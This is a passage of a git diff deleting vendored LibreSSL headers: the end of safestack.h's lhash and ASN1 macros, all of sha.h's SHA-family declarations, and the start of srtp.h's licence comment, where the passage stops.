-	SKM_ASN1_SET_OF_d2i(X509_REVOKED, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_X509_REVOKED(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(X509_REVOKED, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_X509_REVOKED(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(X509_REVOKED, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_X509_REVOKED(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(X509_REVOKED, (buf), (len), (d2i_func), (free_func))
-
-#define PKCS12_decrypt_d2i_PKCS12_SAFEBAG(algor, d2i_func, free_func, pass, passlen, oct, seq) \
-	SKM_PKCS12_decrypt_d2i(PKCS12_SAFEBAG, (algor), (d2i_func), (free_func), (pass), (passlen), (oct), (seq))
-
-#define PKCS12_decrypt_d2i_PKCS7(algor, d2i_func, free_func, pass, passlen, oct, seq) \
-	SKM_PKCS12_decrypt_d2i(PKCS7, (algor), (d2i_func), (free_func), (pass), (passlen), (oct), (seq))
-#endif /* !LIBRESSL_INTERNAL */
-
-#define lh_ADDED_OBJ_new() LHM_lh_new(ADDED_OBJ,added_obj)
-#define lh_ADDED_OBJ_insert(lh,inst) LHM_lh_insert(ADDED_OBJ,lh,inst)
-#define lh_ADDED_OBJ_retrieve(lh,inst) LHM_lh_retrieve(ADDED_OBJ,lh,inst)
-#define lh_ADDED_OBJ_delete(lh,inst) LHM_lh_delete(ADDED_OBJ,lh,inst)
-#define lh_ADDED_OBJ_doall(lh,fn) LHM_lh_doall(ADDED_OBJ,lh,fn)
-#define lh_ADDED_OBJ_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(ADDED_OBJ,lh,fn,arg_type,arg)
-#define lh_ADDED_OBJ_error(lh) LHM_lh_error(ADDED_OBJ,lh)
-#define lh_ADDED_OBJ_num_items(lh) LHM_lh_num_items(ADDED_OBJ,lh)
-#define lh_ADDED_OBJ_down_load(lh) LHM_lh_down_load(ADDED_OBJ,lh)
-#define lh_ADDED_OBJ_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(ADDED_OBJ,lh,out)
-#define lh_ADDED_OBJ_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(ADDED_OBJ,lh,out)
-#define lh_ADDED_OBJ_stats_bio(lh,out) \
-  LHM_lh_stats_bio(ADDED_OBJ,lh,out)
-#define lh_ADDED_OBJ_free(lh) LHM_lh_free(ADDED_OBJ,lh)
-
-#define lh_APP_INFO_new() LHM_lh_new(APP_INFO,app_info)
-#define lh_APP_INFO_insert(lh,inst) LHM_lh_insert(APP_INFO,lh,inst)
-#define lh_APP_INFO_retrieve(lh,inst) LHM_lh_retrieve(APP_INFO,lh,inst)
-#define lh_APP_INFO_delete(lh,inst) LHM_lh_delete(APP_INFO,lh,inst)
-#define lh_APP_INFO_doall(lh,fn) LHM_lh_doall(APP_INFO,lh,fn)
-#define lh_APP_INFO_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(APP_INFO,lh,fn,arg_type,arg)
-#define lh_APP_INFO_error(lh) LHM_lh_error(APP_INFO,lh)
-#define lh_APP_INFO_num_items(lh) LHM_lh_num_items(APP_INFO,lh)
-#define lh_APP_INFO_down_load(lh) LHM_lh_down_load(APP_INFO,lh)
-#define lh_APP_INFO_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(APP_INFO,lh,out)
-#define lh_APP_INFO_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(APP_INFO,lh,out)
-#define lh_APP_INFO_stats_bio(lh,out) \
-  LHM_lh_stats_bio(APP_INFO,lh,out)
-#define lh_APP_INFO_free(lh) LHM_lh_free(APP_INFO,lh)
-
-#define lh_CONF_VALUE_new() LHM_lh_new(CONF_VALUE,conf_value)
-#define lh_CONF_VALUE_insert(lh,inst) LHM_lh_insert(CONF_VALUE,lh,inst)
-#define lh_CONF_VALUE_retrieve(lh,inst) LHM_lh_retrieve(CONF_VALUE,lh,inst)
-#define lh_CONF_VALUE_delete(lh,inst) LHM_lh_delete(CONF_VALUE,lh,inst)
-#define lh_CONF_VALUE_doall(lh,fn) LHM_lh_doall(CONF_VALUE,lh,fn)
-#define lh_CONF_VALUE_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(CONF_VALUE,lh,fn,arg_type,arg)
-#define lh_CONF_VALUE_error(lh) LHM_lh_error(CONF_VALUE,lh)
-#define lh_CONF_VALUE_num_items(lh) LHM_lh_num_items(CONF_VALUE,lh)
-#define lh_CONF_VALUE_down_load(lh) LHM_lh_down_load(CONF_VALUE,lh)
-#define lh_CONF_VALUE_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(CONF_VALUE,lh,out)
-#define lh_CONF_VALUE_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(CONF_VALUE,lh,out)
-#define lh_CONF_VALUE_stats_bio(lh,out) \
-  LHM_lh_stats_bio(CONF_VALUE,lh,out)
-#define lh_CONF_VALUE_free(lh) LHM_lh_free(CONF_VALUE,lh)
-
-#define lh_ENGINE_PILE_new() LHM_lh_new(ENGINE_PILE,engine_pile)
-#define lh_ENGINE_PILE_insert(lh,inst) LHM_lh_insert(ENGINE_PILE,lh,inst)
-#define lh_ENGINE_PILE_retrieve(lh,inst) LHM_lh_retrieve(ENGINE_PILE,lh,inst)
-#define lh_ENGINE_PILE_delete(lh,inst) LHM_lh_delete(ENGINE_PILE,lh,inst)
-#define lh_ENGINE_PILE_doall(lh,fn) LHM_lh_doall(ENGINE_PILE,lh,fn)
-#define lh_ENGINE_PILE_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(ENGINE_PILE,lh,fn,arg_type,arg)
-#define lh_ENGINE_PILE_error(lh) LHM_lh_error(ENGINE_PILE,lh)
-#define lh_ENGINE_PILE_num_items(lh) LHM_lh_num_items(ENGINE_PILE,lh)
-#define lh_ENGINE_PILE_down_load(lh) LHM_lh_down_load(ENGINE_PILE,lh)
-#define lh_ENGINE_PILE_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(ENGINE_PILE,lh,out)
-#define lh_ENGINE_PILE_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(ENGINE_PILE,lh,out)
-#define lh_ENGINE_PILE_stats_bio(lh,out) \
-  LHM_lh_stats_bio(ENGINE_PILE,lh,out)
-#define lh_ENGINE_PILE_free(lh) LHM_lh_free(ENGINE_PILE,lh)
-
-#define lh_ERR_STATE_new() LHM_lh_new(ERR_STATE,err_state)
-#define lh_ERR_STATE_insert(lh,inst) LHM_lh_insert(ERR_STATE,lh,inst)
-#define lh_ERR_STATE_retrieve(lh,inst) LHM_lh_retrieve(ERR_STATE,lh,inst)
-#define lh_ERR_STATE_delete(lh,inst) LHM_lh_delete(ERR_STATE,lh,inst)
-#define lh_ERR_STATE_doall(lh,fn) LHM_lh_doall(ERR_STATE,lh,fn)
-#define lh_ERR_STATE_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(ERR_STATE,lh,fn,arg_type,arg)
-#define lh_ERR_STATE_error(lh) LHM_lh_error(ERR_STATE,lh)
-#define lh_ERR_STATE_num_items(lh) LHM_lh_num_items(ERR_STATE,lh)
-#define lh_ERR_STATE_down_load(lh) LHM_lh_down_load(ERR_STATE,lh)
-#define lh_ERR_STATE_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(ERR_STATE,lh,out)
-#define lh_ERR_STATE_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(ERR_STATE,lh,out)
-#define lh_ERR_STATE_stats_bio(lh,out) \
-  LHM_lh_stats_bio(ERR_STATE,lh,out)
-#define lh_ERR_STATE_free(lh) LHM_lh_free(ERR_STATE,lh)
-
-#define lh_ERR_STRING_DATA_new() LHM_lh_new(ERR_STRING_DATA,err_string_data)
-#define lh_ERR_STRING_DATA_insert(lh,inst) LHM_lh_insert(ERR_STRING_DATA,lh,inst)
-#define lh_ERR_STRING_DATA_retrieve(lh,inst) LHM_lh_retrieve(ERR_STRING_DATA,lh,inst)
-#define lh_ERR_STRING_DATA_delete(lh,inst) LHM_lh_delete(ERR_STRING_DATA,lh,inst)
-#define lh_ERR_STRING_DATA_doall(lh,fn) LHM_lh_doall(ERR_STRING_DATA,lh,fn)
-#define lh_ERR_STRING_DATA_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(ERR_STRING_DATA,lh,fn,arg_type,arg)
-#define lh_ERR_STRING_DATA_error(lh) LHM_lh_error(ERR_STRING_DATA,lh)
-#define lh_ERR_STRING_DATA_num_items(lh) LHM_lh_num_items(ERR_STRING_DATA,lh)
-#define lh_ERR_STRING_DATA_down_load(lh) LHM_lh_down_load(ERR_STRING_DATA,lh)
-#define lh_ERR_STRING_DATA_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(ERR_STRING_DATA,lh,out)
-#define lh_ERR_STRING_DATA_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(ERR_STRING_DATA,lh,out)
-#define lh_ERR_STRING_DATA_stats_bio(lh,out) \
-  LHM_lh_stats_bio(ERR_STRING_DATA,lh,out)
-#define lh_ERR_STRING_DATA_free(lh) LHM_lh_free(ERR_STRING_DATA,lh)
-
-#define lh_EX_CLASS_ITEM_new() LHM_lh_new(EX_CLASS_ITEM,ex_class_item)
-#define lh_EX_CLASS_ITEM_insert(lh,inst) LHM_lh_insert(EX_CLASS_ITEM,lh,inst)
-#define lh_EX_CLASS_ITEM_retrieve(lh,inst) LHM_lh_retrieve(EX_CLASS_ITEM,lh,inst)
-#define lh_EX_CLASS_ITEM_delete(lh,inst) LHM_lh_delete(EX_CLASS_ITEM,lh,inst)
-#define lh_EX_CLASS_ITEM_doall(lh,fn) LHM_lh_doall(EX_CLASS_ITEM,lh,fn)
-#define lh_EX_CLASS_ITEM_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(EX_CLASS_ITEM,lh,fn,arg_type,arg)
-#define lh_EX_CLASS_ITEM_error(lh) LHM_lh_error(EX_CLASS_ITEM,lh)
-#define lh_EX_CLASS_ITEM_num_items(lh) LHM_lh_num_items(EX_CLASS_ITEM,lh)
-#define lh_EX_CLASS_ITEM_down_load(lh) LHM_lh_down_load(EX_CLASS_ITEM,lh)
-#define lh_EX_CLASS_ITEM_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(EX_CLASS_ITEM,lh,out)
-#define lh_EX_CLASS_ITEM_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(EX_CLASS_ITEM,lh,out)
-#define lh_EX_CLASS_ITEM_stats_bio(lh,out) \
-  LHM_lh_stats_bio(EX_CLASS_ITEM,lh,out)
-#define lh_EX_CLASS_ITEM_free(lh) LHM_lh_free(EX_CLASS_ITEM,lh)
-
-#define lh_FUNCTION_new() LHM_lh_new(FUNCTION,function)
-#define lh_FUNCTION_insert(lh,inst) LHM_lh_insert(FUNCTION,lh,inst)
-#define lh_FUNCTION_retrieve(lh,inst) LHM_lh_retrieve(FUNCTION,lh,inst)
-#define lh_FUNCTION_delete(lh,inst) LHM_lh_delete(FUNCTION,lh,inst)
-#define lh_FUNCTION_doall(lh,fn) LHM_lh_doall(FUNCTION,lh,fn)
-#define lh_FUNCTION_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(FUNCTION,lh,fn,arg_type,arg)
-#define lh_FUNCTION_error(lh) LHM_lh_error(FUNCTION,lh)
-#define lh_FUNCTION_num_items(lh) LHM_lh_num_items(FUNCTION,lh)
-#define lh_FUNCTION_down_load(lh) LHM_lh_down_load(FUNCTION,lh)
-#define lh_FUNCTION_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(FUNCTION,lh,out)
-#define lh_FUNCTION_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(FUNCTION,lh,out)
-#define lh_FUNCTION_stats_bio(lh,out) \
-  LHM_lh_stats_bio(FUNCTION,lh,out)
-#define lh_FUNCTION_free(lh) LHM_lh_free(FUNCTION,lh)
-
-#define lh_MEM_new() LHM_lh_new(MEM,mem)
-#define lh_MEM_insert(lh,inst) LHM_lh_insert(MEM,lh,inst)
-#define lh_MEM_retrieve(lh,inst) LHM_lh_retrieve(MEM,lh,inst)
-#define lh_MEM_delete(lh,inst) LHM_lh_delete(MEM,lh,inst)
-#define lh_MEM_doall(lh,fn) LHM_lh_doall(MEM,lh,fn)
-#define lh_MEM_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(MEM,lh,fn,arg_type,arg)
-#define lh_MEM_error(lh) LHM_lh_error(MEM,lh)
-#define lh_MEM_num_items(lh) LHM_lh_num_items(MEM,lh)
-#define lh_MEM_down_load(lh) LHM_lh_down_load(MEM,lh)
-#define lh_MEM_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(MEM,lh,out)
-#define lh_MEM_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(MEM,lh,out)
-#define lh_MEM_stats_bio(lh,out) \
-  LHM_lh_stats_bio(MEM,lh,out)
-#define lh_MEM_free(lh) LHM_lh_free(MEM,lh)
-
-#define lh_OBJ_NAME_new() LHM_lh_new(OBJ_NAME,obj_name)
-#define lh_OBJ_NAME_insert(lh,inst) LHM_lh_insert(OBJ_NAME,lh,inst)
-#define lh_OBJ_NAME_retrieve(lh,inst) LHM_lh_retrieve(OBJ_NAME,lh,inst)
-#define lh_OBJ_NAME_delete(lh,inst) LHM_lh_delete(OBJ_NAME,lh,inst)
-#define lh_OBJ_NAME_doall(lh,fn) LHM_lh_doall(OBJ_NAME,lh,fn)
-#define lh_OBJ_NAME_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(OBJ_NAME,lh,fn,arg_type,arg)
-#define lh_OBJ_NAME_error(lh) LHM_lh_error(OBJ_NAME,lh)
-#define lh_OBJ_NAME_num_items(lh) LHM_lh_num_items(OBJ_NAME,lh)
-#define lh_OBJ_NAME_down_load(lh) LHM_lh_down_load(OBJ_NAME,lh)
-#define lh_OBJ_NAME_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(OBJ_NAME,lh,out)
-#define lh_OBJ_NAME_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(OBJ_NAME,lh,out)
-#define lh_OBJ_NAME_stats_bio(lh,out) \
-  LHM_lh_stats_bio(OBJ_NAME,lh,out)
-#define lh_OBJ_NAME_free(lh) LHM_lh_free(OBJ_NAME,lh)
-
-#define lh_OPENSSL_CSTRING_new() LHM_lh_new(OPENSSL_CSTRING,openssl_cstring)
-#define lh_OPENSSL_CSTRING_insert(lh,inst) LHM_lh_insert(OPENSSL_CSTRING,lh,inst)
-#define lh_OPENSSL_CSTRING_retrieve(lh,inst) LHM_lh_retrieve(OPENSSL_CSTRING,lh,inst)
-#define lh_OPENSSL_CSTRING_delete(lh,inst) LHM_lh_delete(OPENSSL_CSTRING,lh,inst)
-#define lh_OPENSSL_CSTRING_doall(lh,fn) LHM_lh_doall(OPENSSL_CSTRING,lh,fn)
-#define lh_OPENSSL_CSTRING_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(OPENSSL_CSTRING,lh,fn,arg_type,arg)
-#define lh_OPENSSL_CSTRING_error(lh) LHM_lh_error(OPENSSL_CSTRING,lh)
-#define lh_OPENSSL_CSTRING_num_items(lh) LHM_lh_num_items(OPENSSL_CSTRING,lh)
-#define lh_OPENSSL_CSTRING_down_load(lh) LHM_lh_down_load(OPENSSL_CSTRING,lh)
-#define lh_OPENSSL_CSTRING_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(OPENSSL_CSTRING,lh,out)
-#define lh_OPENSSL_CSTRING_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(OPENSSL_CSTRING,lh,out)
-#define lh_OPENSSL_CSTRING_stats_bio(lh,out) \
-  LHM_lh_stats_bio(OPENSSL_CSTRING,lh,out)
-#define lh_OPENSSL_CSTRING_free(lh) LHM_lh_free(OPENSSL_CSTRING,lh)
-
-#define lh_OPENSSL_STRING_new() LHM_lh_new(OPENSSL_STRING,openssl_string)
-#define lh_OPENSSL_STRING_insert(lh,inst) LHM_lh_insert(OPENSSL_STRING,lh,inst)
-#define lh_OPENSSL_STRING_retrieve(lh,inst) LHM_lh_retrieve(OPENSSL_STRING,lh,inst)
-#define lh_OPENSSL_STRING_delete(lh,inst) LHM_lh_delete(OPENSSL_STRING,lh,inst)
-#define lh_OPENSSL_STRING_doall(lh,fn) LHM_lh_doall(OPENSSL_STRING,lh,fn)
-#define lh_OPENSSL_STRING_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(OPENSSL_STRING,lh,fn,arg_type,arg)
-#define lh_OPENSSL_STRING_error(lh) LHM_lh_error(OPENSSL_STRING,lh)
-#define lh_OPENSSL_STRING_num_items(lh) LHM_lh_num_items(OPENSSL_STRING,lh)
-#define lh_OPENSSL_STRING_down_load(lh) LHM_lh_down_load(OPENSSL_STRING,lh)
-#define lh_OPENSSL_STRING_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(OPENSSL_STRING,lh,out)
-#define lh_OPENSSL_STRING_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(OPENSSL_STRING,lh,out)
-#define lh_OPENSSL_STRING_stats_bio(lh,out) \
-  LHM_lh_stats_bio(OPENSSL_STRING,lh,out)
-#define lh_OPENSSL_STRING_free(lh) LHM_lh_free(OPENSSL_STRING,lh)
-
-#define lh_SSL_SESSION_new() LHM_lh_new(SSL_SESSION,ssl_session)
-#define lh_SSL_SESSION_insert(lh,inst) LHM_lh_insert(SSL_SESSION,lh,inst)
-#define lh_SSL_SESSION_retrieve(lh,inst) LHM_lh_retrieve(SSL_SESSION,lh,inst)
-#define lh_SSL_SESSION_delete(lh,inst) LHM_lh_delete(SSL_SESSION,lh,inst)
-#define lh_SSL_SESSION_doall(lh,fn) LHM_lh_doall(SSL_SESSION,lh,fn)
-#define lh_SSL_SESSION_doall_arg(lh,fn,arg_type,arg) \
-  LHM_lh_doall_arg(SSL_SESSION,lh,fn,arg_type,arg)
-#define lh_SSL_SESSION_error(lh) LHM_lh_error(SSL_SESSION,lh)
-#define lh_SSL_SESSION_num_items(lh) LHM_lh_num_items(SSL_SESSION,lh)
-#define lh_SSL_SESSION_down_load(lh) LHM_lh_down_load(SSL_SESSION,lh)
-#define lh_SSL_SESSION_node_stats_bio(lh,out) \
-  LHM_lh_node_stats_bio(SSL_SESSION,lh,out)
-#define lh_SSL_SESSION_node_usage_stats_bio(lh,out) \
-  LHM_lh_node_usage_stats_bio(SSL_SESSION,lh,out)
-#define lh_SSL_SESSION_stats_bio(lh,out) \
-  LHM_lh_stats_bio(SSL_SESSION,lh,out)
-#define lh_SSL_SESSION_free(lh) LHM_lh_free(SSL_SESSION,lh)
-/* End of util/mkstack.pl block, you may now edit :-) */
-
-#endif /* !defined HEADER_SAFESTACK_H */
diff --git a/thirdparty/libressl/include/openssl/sha.h b/thirdparty/libressl/include/openssl/sha.h
deleted file mode 100644
index 87fdf8d..0000000
--- a/thirdparty/libressl/include/openssl/sha.h
+++ /dev/null
@@ -1,192 +0,0 @@
-/* $OpenBSD: sha.h,v 1.21 2015/09/13 21:09:56 doug Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#include <stddef.h>
-
-#ifndef HEADER_SHA_H
-#define HEADER_SHA_H
-#if !defined(HAVE_ATTRIBUTE__BOUNDED__) && !defined(__OpenBSD__)
-#define __bounded__(x, y, z)
-#endif
-
-#include <openssl/opensslconf.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#if defined(OPENSSL_NO_SHA) || defined(OPENSSL_NO_SHA1)
-#error SHA is disabled.
-#endif
-
-/*
- * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- * ! SHA_LONG has to be at least 32 bits wide.                    !
- * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- */
-
-#define SHA_LONG unsigned int
-
-#define SHA_LBLOCK	16
-#define SHA_CBLOCK	(SHA_LBLOCK*4)	/* SHA treats input data as a
-					 * contiguous array of 32 bit
-					 * wide big-endian values. */
-#define SHA_LAST_BLOCK  (SHA_CBLOCK-8)
-#define SHA_DIGEST_LENGTH 20
-
-typedef struct SHAstate_st
-	{
-	SHA_LONG h0,h1,h2,h3,h4;
-	SHA_LONG Nl,Nh;
-	SHA_LONG data[SHA_LBLOCK];
-	unsigned int num;
-	} SHA_CTX;
-
-#ifndef OPENSSL_NO_SHA1
-int SHA1_Init(SHA_CTX *c);
-int SHA1_Update(SHA_CTX *c, const void *data, size_t len)
-	__attribute__ ((__bounded__(__buffer__,2,3)));
-int SHA1_Final(unsigned char *md, SHA_CTX *c);
-unsigned char *SHA1(const unsigned char *d, size_t n, unsigned char *md)
-	__attribute__ ((__bounded__(__buffer__,1,2)));
-void SHA1_Transform(SHA_CTX *c, const unsigned char *data);
-#endif
-
-#define SHA256_CBLOCK	(SHA_LBLOCK*4)	/* SHA-256 treats input data as a
-					 * contiguous array of 32 bit
-					 * wide big-endian values. */
-#define SHA224_DIGEST_LENGTH	28
-#define SHA256_DIGEST_LENGTH	32
-
-typedef struct SHA256state_st
-	{
-	SHA_LONG h[8];
-	SHA_LONG Nl,Nh;
-	SHA_LONG data[SHA_LBLOCK];
-	unsigned int num,md_len;
-	} SHA256_CTX;
-
-#ifndef OPENSSL_NO_SHA256
-int SHA224_Init(SHA256_CTX *c);
-int SHA224_Update(SHA256_CTX *c, const void *data, size_t len)
-	__attribute__ ((__bounded__(__buffer__,2,3)));
-int SHA224_Final(unsigned char *md, SHA256_CTX *c);
-unsigned char *SHA224(const unsigned char *d, size_t n,unsigned char *md)
-	__attribute__ ((__bounded__(__buffer__,1,2)));
-int SHA256_Init(SHA256_CTX *c);
-int SHA256_Update(SHA256_CTX *c, const void *data, size_t len)
-	__attribute__ ((__bounded__(__buffer__,2,3)));
-int SHA256_Final(unsigned char *md, SHA256_CTX *c);
-unsigned char *SHA256(const unsigned char *d, size_t n,unsigned char *md)
-	__attribute__ ((__bounded__(__buffer__,1,2)));
-void SHA256_Transform(SHA256_CTX *c, const unsigned char *data);
-#endif
-
-#define SHA384_DIGEST_LENGTH	48
-#define SHA512_DIGEST_LENGTH	64
-
-#ifndef OPENSSL_NO_SHA512
-/*
- * Unlike 32-bit digest algorithms, SHA-512 *relies* on SHA_LONG64
- * being exactly 64-bit wide. See Implementation Notes in sha512.c
- * for further details.
- */
-#define SHA512_CBLOCK	(SHA_LBLOCK*8)	/* SHA-512 treats input data as a
-					 * contiguous array of 64 bit
-					 * wide big-endian values. */
-#if defined(_LP64)
-#define SHA_LONG64 unsigned long
-#define U64(C)     C##UL
-#else
-#define SHA_LONG64 unsigned long long
-#define U64(C)     C##ULL
-#endif
-
-typedef struct SHA512state_st
-	{
-	SHA_LONG64 h[8];
-	SHA_LONG64 Nl,Nh;
-	union {
-		SHA_LONG64	d[SHA_LBLOCK];
-		unsigned char	p[SHA512_CBLOCK];
-	} u;
-	unsigned int num,md_len;
-	} SHA512_CTX;
-#endif
-
-#ifndef OPENSSL_NO_SHA512
-int SHA384_Init(SHA512_CTX *c);
-int SHA384_Update(SHA512_CTX *c, const void *data, size_t len)
-	__attribute__ ((__bounded__(__buffer__,2,3)));
-int SHA384_Final(unsigned char *md, SHA512_CTX *c);
-unsigned char *SHA384(const unsigned char *d, size_t n,unsigned char *md)
-	__attribute__ ((__bounded__(__buffer__,1,2)));
-int SHA512_Init(SHA512_CTX *c);
-int SHA512_Update(SHA512_CTX *c, const void *data, size_t len)
-	__attribute__ ((__bounded__(__buffer__,2,3)));
-int SHA512_Final(unsigned char *md, SHA512_CTX *c);
-unsigned char *SHA512(const unsigned char *d, size_t n,unsigned char *md)
-	__attribute__ ((__bounded__(__buffer__,1,2)));
-void SHA512_Transform(SHA512_CTX *c, const unsigned char *data);
-#endif
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/srtp.h b/thirdparty/libressl/include/openssl/srtp.h
deleted file mode 100644
index 6daa02a..0000000
--- a/thirdparty/libressl/include/openssl/srtp.h
+++ /dev/null
@@ -1,142 +0,0 @@
-/* $OpenBSD: srtp.h,v 1.6 2015/09/01 15:18:23 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
